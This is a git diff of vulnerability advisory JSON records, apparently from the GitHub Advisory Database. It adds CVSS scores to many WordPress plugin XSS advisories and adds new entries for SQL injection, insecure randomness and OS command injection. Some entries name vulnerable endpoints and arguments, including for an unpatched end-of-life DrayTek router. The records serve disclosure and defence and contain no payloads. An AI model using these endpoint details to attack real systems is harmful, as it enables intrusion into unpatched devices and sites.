"2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69388" ], "details": "Missing Authorization vulnerability in cliengo Cliengo – Chatbot cliengo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cliengo – Chatbot: from n/a through <= 3.0.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json index 5d71126f9afd7..7f923978eeeba 100644 --- a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json +++ b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-43rm-rg7w-7rjf", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68863" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz iContact for Gravity Forms gravity-forms-icontact allows Reflected XSS.This issue affects iContact for Gravity Forms: from n/a through <= 1.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json index c9d372c9ff3e2..ac5c3eb067186 100644 --- a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json +++ b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4fwr-9c58-jg7x", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68856" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in keeswolters Mopinion Feedback Form mopinion-feedback-form allows DOM-Based XSS.This issue affects Mopinion Feedback Form: from n/a through <= 1.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json index 485a654633815..af5bd74f8d307 100644 --- a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json +++ b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4pmr-jmj5-4gwv", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-68495" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS.This issue affects JetEngine: from n/a through <= 3.8.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json index ceee3bff547c1..979e39f99714c 100644 --- a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json +++ b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5284-5qqc-v2w8", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-68037" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atlas Gondal Export Media URLs export-media-urls allows Reflected XSS.This issue affects Export Media URLs: from n/a through <= 2.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json index cb83f3759f068..5ffed1cb9e4f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json +++ b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-57vf-72qj-2828", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69330" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Prestige prestige allows Reflected XSS.This issue affects Prestige: from n/a through < 1.4.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json index 0913f69239cb2..b77c607dc49f2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json +++ b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5j3p-mg5x-539j", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68847" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iSape isape allows Reflected XSS.This issue affects iSape: from n/a through <= 0.72.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json index 09c5bcebbaacf..74eed527406ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json +++ b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-63v8-38hf-jrfm", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69392" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iMoney imoney allows Reflected XSS.This issue affects iMoney: from n/a through <= 0.36.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json b/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json new file mode 100644 index 0000000000000..2234915accd2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hhh-7cj8-7mp2", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2024-58041" + ], + "details": "Smolder versions through 1.51 for Perl uses insecure rand() function for cryptographic functions.\n\nSmolder 1.51 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.\n\nSpecifically Smolder::DB::Developer uses the Data::Random library which specifically states that it is \"Useful mostly for test programs\". Data::Random uses the rand() function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-58041" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/BAREFOOT/Data-Random-0.13/source/lib/Data/Random.pm#L537" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/WONKO/Smolder-1.51/source/lib/Smolder/DB/Developer.pm#L221" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/WONKO/Smolder-1.51/source/lib/Smolder/DB/Developer.pm#L5" + }, + { + "type": "WEB", + "url": "https://perldoc.perl.org/functions/rand" + }, + { + "type": "WEB", + "url": "https://security.metacpan.org/docs/guides/random-data-for-security.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-338" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json index 302d95675b37d..dfceae67dc926 100644 --- a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json +++ b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-76g3-wv5g-g883", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22352" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PersianScript Persian Woocommerce SMS persian-woocommerce-sms allows Reflected XSS.This issue affects Persian Woocommerce SMS: from n/a through <= 7.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json index 9822ee51db2cf..615fd23954b78 100644 --- a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json +++ b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-877x-j2fm-2mw5", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69384" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdiscover Timeline Event History timeline-event-history allows Reflected XSS.This issue affects Timeline Event History: from n/a through <= 3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json index 1e15d52fce9f8..bb415c1393c60 100644 --- a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json +++ b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8p6j-8fq8-23rr", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68880" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in peterwsterling Simple Archive Generator simple-archive-generator allows Reflected XSS.This issue affects Simple Archive Generator: from n/a through <= 5.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json b/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json new file mode 100644 index 0000000000000..6073652a622d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-972x-fv77-xf59", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3042" + ], + "details": "A vulnerability was detected in itsourcecode Event Management System 1.0. The affected element is an unknown function of the file /admin/index.php. Performing a manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3042" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/cve_submit/issues/1" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757226" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json index 269016f3e5da1..5aaae199b54c3 100644 --- a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json +++ b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-97g7-x3h6-6ccc", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-24943" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference grandconference allows Reflected XSS.This issue affects Grand Conference: from n/a through <= 5.3.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:38Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json index 9544e750c3d97..23f161b7ee06f 100644 --- a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json +++ b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9mr9-pcmg-4xr7", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53237" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soflyy WP Wizard Cloak wp-wizard-cloak allows Reflected XSS.This issue affects WP Wizard Cloak: from n/a through <= 1.0.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json index 10798f0533acb..10b4b1f62ed27 100644 --- a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json +++ b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9w4h-qf26-hvrv", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69326" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Reflected XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json b/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json new file mode 100644 index 0000000000000..09dd9bf9dc907 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xx2-jmjv-w5vp", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3040" + ], + "details": "A vulnerability was identified in DrayTek Vigor 300B up to 1.5.1.6. This affects the function cgiGetFile of the file /cgi-bin/mainfunction.cgi/uploadlangs of the component Web Management Interface. The manipulation of the argument File leads to os command injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor confirms that \"300B is EoL, and this is an authenticated vulnerability. We don't plan to fix it.\" This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3040" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/42" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347394" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347394" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757126" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json index 0c2b2327fbe4e..219034d3b1db9 100644 --- a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json +++ b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cvm5-m63f-8wmv", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68843" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bas Schuiling FeedWordPress Advanced Filters faf allows Reflected XSS.This issue affects FeedWordPress Advanced Filters: from n/a through <= 0.6.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json index eb47df052da3f..0f30c4eb31af6 100644 --- a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json +++ b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f6pr-2mv6-45fq", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68846" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paris Holley Asynchronous Javascript asynchronous-javascript allows Reflected XSS.This issue affects Asynchronous Javascript: from n/a through <= 1.3.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json index fe2cdcbe77e28..6ba514a498948 100644 --- a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json +++ b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fc39-6hhj-gr5p", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67971" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPManageNinja FluentCart fluent-cart allows Reflected XSS.This issue affects FluentCart: from n/a through < 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json index df9d8756a17e9..49364c356264d 100644 --- a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json +++ b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g3qj-5j85-8w2c", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53228" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jezza101 bbpress Simple Advert Units bbpress-simple-advert-units allows Reflected XSS.This issue affects bbpress Simple Advert Units: from n/a through <= 0.41.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 